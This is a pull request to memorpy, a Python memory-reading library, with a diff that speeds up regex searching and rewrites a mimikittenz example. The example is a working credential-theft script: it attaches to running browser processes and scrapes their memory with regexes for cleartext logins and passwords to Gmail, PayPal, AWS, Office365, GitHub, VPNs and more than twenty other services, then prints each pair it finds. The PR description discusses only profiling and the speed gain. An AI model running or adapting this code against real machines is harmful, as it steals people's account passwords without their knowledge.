### PR TITLE
elapsed time improved

### DIFF
--- a/examples/mimikittenz.py
+++ b/examples/mimikittenz.py
@@ -13,56 +13,58 @@ import time
 
 #from https://github.com/putterpanda/mimikittenz
 mimikittenz_regex=[
-    ("Gmail","&Email=.{1,99}?&Passwd=.{1,99}?&PersistentCookie="),
-    ("Dropbox","login_email=.{1,99}&login_password=.{1,99}&"),
-    ("SalesForce","&display=page&username=.{1,32}&pw=.{1,16}&Login="),
-    ("Office365","login=.{1,32}&passwd=.{1,22}&PPSX="),
-    ("MicrosoftOneDrive","login=.{1,42}&passwd=.{1,22}&type=.{1,2}&PPFT="),
-    ("PayPal","login_email=.{1,48}&login_password=.{1,16}&submit=Log\+In&browser_name"),
-    ("awsWebServices","&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1="),
-    ("OutlookWeb","&username=.{1,48}&password=.{1,48}&passwordText"),
-    ("Slack","&crumb=.{1,70}&email=.{1,50}&password=.{1,48}"),
-    ("CitrixOnline","emailAddress=.{1,50}&password=.{1,50}&submit"),
-    ("Xero ","fragment=&userName=.{1,32}&password=.{1,22}&__RequestVerificationToken="),
-    ("MYOB","UserName=.{1,50}&Password=.{1,50}&RememberMe="),
-    ("JuniperSSLVPN","tz_offset=-.{1,6}&username=.{1,22}&password=.{1,22}&realm=.{1,22}&btnSubmit="),
-    ("Twitter","username_or_email%5D=.{1,42}&session%5Bpassword%5D=.{1,22}&remember_me="),
-    ("Facebook","lsd=.{1,10}&email=.{1,42}&pass=.{1,22}&(?:default_)?persistent="),
-    ("LinkedIN","session_key=.{1,50}&session_password=.{1,50}&isJsEnabled"),
-    ("Malwr","&username=.{1,32}&password=.{1,22}&next="),
-    ("VirusTotal","password=.{1,22}&username=.{1,42}&next=%2Fen%2F&response_format=json"),
-    ("AnubisLabs","username=.{1,42}&password=.{1,22}&login=login"),
-    ("CitrixNetScaler","login=.{1,22}&passwd=.{1,42}"),
-    ("RDPWeb","DomainUserName=.{1,52}&UserPass=.{1,42}&MachineType"),
-    ("JIRA","username=.{1,50}&password=.{1,50}&rememberMe"),
-    ("Redmine","username=.{1,50}&password=.{1,50}&login=Login"),
-    ("Github","%3D%3D&login=.{1,50}&password=.{1,50}"),
-    ("BugZilla","Bugzilla_login=.{1,50}&Bugzilla_password=.{1,50}"),
-    ("Zendesk","user%5Bemail%5D=.{1,50}&user%5Bpassword%5D=.{1,50}"),
-    ("Cpanel","user=.{1,50}&pass=.{1,50}"),
+    ("Gmail","&Email=(?P<Login>.{1,99})?&Passwd=(?P<Password>.{1,99})?&PersistentCookie="),
+    ("Dropbox","login_email=(?P<Login>.{1,99})&login_password=(?P<Password>.{1,99})&"),
+    ("SalesForce","&display=page&username=(?P<Login>.{1,32})&pw=(?P<Password>.{1,16})&Login="),
+    ("Office365","login=(?P<Login>.{1,32})&passwd=(?P<Password>.{1,22})&PPSX="),
+    ("MicrosoftOneDrive","login=(?P<Login>.{1,42})&passwd=(?P<Password>.{1,22})&type=.{1,2}&PPFT="),
+    ("PayPal","login_email=(?P<Login>.{1,48})&login_password=(?P<Password>.{1,16})&submit=Log\+In&browser_name"),
+    ("awsWebServices","&email=(?P<Login>.{1,48})&create=.{1,2}&password=(?P<Password>.{1,22})&metadata1="),
+    ("OutlookWeb","&username=(?P<Login>.{1,48})&password=(?P<Password>.{1,48})&passwordText"),
+    ("Slack","&crumb=.{1,70}&email=(?P<Login>.{1,50})&password=(?P<Password>.{1,48})"),
+    ("CitrixOnline","emailAddress=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&submit"),
+    ("Xero ","fragment=&userName=(?P<Login>.{1,32})&password=(?P<Password>.{1,22})&__RequestVerificationToken="),
+    ("MYOB","UserName=(?P<Login>.{1,50})&Password=(?P<Password>.{1,50})&RememberMe="),
+    ("JuniperSSLVPN","tz_offset=-.{1,6}&username=(?P<Login>.{1,22})&password=(?P<Password>.{1,22})&realm=.{1,22}&btnSubmit="),
+    ("Twitter","username_or_email%5D=(?P<Login>.{1,42})&session%5Bpassword%5D=(?P<Password>.{1,22})&remember_me="),
+    ("Facebook","lsd=.{1,10}&email=(?P<Login>.{1,42})&pass=(?P<Password>.{1,22})&(?:default_)?persistent="),
+    ("LinkedIN","session_key=(?P<Login>.{1,50})&session_password=(?P<Password>.{1,50})&isJsEnabled"),
+    ("Malwr","&username=(?P<Login>.{1,32})&password=(?P<Password>.{1,22})&next="),
+    ("VirusTotal","password=(?P<Password>.{1,22})&username=(?P<Login>.{1,42})&next=%2Fen%2F&response_format=json"),
+    ("AnubisLabs","username=(?P<Login>.{1,42})&password=(?P<Password>.{1,22})&login=login"),
+    ("CitrixNetScaler","login=(?P<Login>.{1,22})&passwd=(?P<Password>.{1,42})"),
+    ("RDPWeb","DomainUserName=(?P<Login>.{1,52})&UserPass=(?P<Password>.{1,42})&MachineType"),
+    ("JIRA","username=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&rememberMe"),
+    ("Redmine","username=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})&login=Login"),
+    ("Github","%3D%3D&login=(?P<Login>.{1,50})&password=(?P<Password>.{1,50})"),
+    ("BugZilla","Bugzilla_login=(?P<Login>.{1,50})&Bugzilla_password=(?P<Password>.{1,50})"),
+    ("Zendesk","user%5Bemail%5D=(?P<Login>.{1,50})&user%5Bpassword%5D=(?P<Password>.{1,50})"),
+    ("Cpanel","user=(?P<Login>.{1,50})&pass=(?P<Password>.{1,50})"),
 ]
 
 if sys.platform=="win32":
     browser_list=["iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "MicrosoftEdge.exe", "microsoftedgecp.exe"]
 else:
     browser_list=["firefox", "iceweasel", "chromium", "chrome"]
-
+    
 def dump_browser_passwords():
     start_time=time.time()
-    for browser in browser_list:
-        try:
-            mw=MemWorker(name=browser)
-        except ProcessException:
-            continue
-        print "dumping passwords from %s ..."%browser
-        for service, regex in mimikittenz_regex:
-            for x in mw.mem_search(regex, ftype='re'):
-                try:
-                    print "\t[+] %s : %s"%(service, x.read(type="string", maxlen=100, errors='ignore'))
-                except Exception as e:
-                    print e
+    for process in Process.list():
+        if process.get('name') in browser_list:
+            try:
+                mw = MemWorker(pid=process.get('pid'))
+            except ProcessException:
+                continue
+            
+            print 'dumping passwords from %s (pid: %s) ...' % (process.get('name'), str(process.get('pid')))
+            for service, x in mw.mem_search(mimikittenz_regex, ftype='groups'):
+                print '[+] Software: %s' % service
+                print '[+] Login: %s' % x[0]
+                print '[+] Password: %s\n' % x[1]
+
     print "All passwords dumped in %ss"%(time.time()-start_time)
-     
+
+
 if __name__=="__main__":
     dump_browser_passwords()
 

--- a/memorpy/LinProcess.py
+++ b/memorpy/LinProcess.py
@@ -128,6 +128,7 @@ class LinProcess(BaseProcess):
             self.ptrace_detach()
 
     def _open(self):
+        self.isProcessOpen = True
         self.check_ptrace_scope()
         #to raise an exception if ptrace is not allowed
         self.ptrace_attach()

--- a/memorpy/MemWorker.py
+++ b/memorpy/MemWorker.py
@@ -89,10 +89,7 @@ class MemWorker(object):
         return self.mem_search(re.escape(regex), ftype='re')
 
     def parse_re_function(self, b, value):
-        for reg in value:
-            name = reg[0]
-            regex = reg[1]
-
+        for name, regex in value:
             duplicates_cache = set()
             for res in regex.findall(b):
                 index = b.find(res)
@@ -115,9 +112,7 @@ class MemWorker(object):
                 pass
 
     def parse_groups_function(self, b, value):
-        for reg in value:
-            name = reg[0]
-            regex = reg[1]
+        for name, regex in value:
             for res in regex.findall(b):
                 yield name, res
 
@@ -144,10 +139,10 @@ class MemWorker(object):
             for reg in value:
                 if type(reg) is tuple:
                     name = reg[0]
-                    regex = re.compile(reg[1])
+                    regex = re.compile(reg[1], re.IGNORECASE)
                 else:
                     name = ''
-                    regex = re.compile(reg)
+                    regex = re.compile(reg, re.IGNORECASE)
 
                 tmp.append((name, regex))
             value = tmp

--- a/memorpy/MemWorker.py
+++ b/memorpy/MemWorker.py
@@ -88,7 +88,7 @@ class MemWorker(object):
 
         return self.mem_search(re.escape(regex), ftype='re')
 
-    def parse_re_function(self, b, value):
+    def parse_re_function(self, b, value, offset):
         for name, regex in value:
             duplicates_cache = set()
             for res in regex.findall(b):
@@ -100,7 +100,7 @@ class MemWorker(object):
                         yield name, self.Address(soffset, 'bytes')
                     index = b.find(res, index + len(res))
 
-    def parse_float_function(self, b, value):
+    def parse_float_function(self, b, value, offset):
         for index in range(0, len(b)):
             try:
                 structtype, structlen = utils.type_unpack('float')
@@ -111,12 +111,12 @@ class MemWorker(object):
             except Exception as e:
                 pass
 
-    def parse_groups_function(self, b, value):
+    def parse_groups_function(self, b, value, offset=None):
         for name, regex in value:
             for res in regex.findall(b):
                 yield name, res
 
-    def parse_any_function(self, b, value):
+    def parse_any_function(self, b, value, offset):
         index = b.find(value)
         while index != -1:
             soffset = offset + index
@@ -194,5 +194,5 @@ class MemWorker(object):
                 continue
 
             if b:
-                for name, res in func(b, value):
+                for name, res in func(b, value, offset):
                     yield name, res


### PR DESCRIPTION
I have done some tests to improve the elapsed time of the program. 

On a process, using the mimikittenz example I have passed from 14 s to 5 s,  so the time has been considerably reduced. 

I didn't commit the changed done on the mimikitenz example (I could do if you want). However, now, the regex tab is passed as parameter as parameter because it's faster to dump a part of memory and for this part to test each regex than to check one regex in the entire memory, then to dump the read the memory again for another regex, etc...

I have also tried to remove as much as possible "if" statement to gain time consuming. 

This has been done using profiling tools :) 